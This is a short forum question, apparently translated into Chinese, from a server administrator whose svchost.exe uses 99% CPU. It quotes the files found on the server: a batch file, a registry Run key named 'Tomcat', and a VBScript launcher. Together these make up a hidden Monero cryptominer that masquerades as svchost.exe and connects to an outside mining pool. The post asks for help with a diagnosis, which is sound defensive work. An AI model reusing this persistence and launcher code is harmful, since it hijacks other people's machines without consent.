SVC 主机消耗 99% CPU

SVC 主机消耗 99% CPU

我们的服务器持续消耗过多的 CPU,这svchost.exe似乎是罪魁祸首。

参见下面的屏幕截图:

在此处输入图片描述

文件内容1.bat

svchost -a cryptonight -o stratum+tcp://xmr.prohash.net:7777 -u 4AyP2DqMQ---SomeLongCodeHere---ZFnqXUrf -p x

文件内容pubwin.reg

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Tomcat"="C:\\Windows\\system\\pubwin.vbs"

文件内容pubwin.vbs

dim objShell
set objShell=wscript.createObject("WScript.Shell")
WScript.Sleep(20000)
iReturnCode=objShell.Run("""C:\Windows\system\svchost.exe""  -a cryptonight -o stratum+tcp://xmr.prohash.net:7777 -u 4AyP2Dq----SomeLongCodeHere---zdLZGeEQqZTZeBLuSNnqXUrf -p x",vbhide)

我们应该担心吗,或者说确实如此**Tomcat**

答案1

相关内容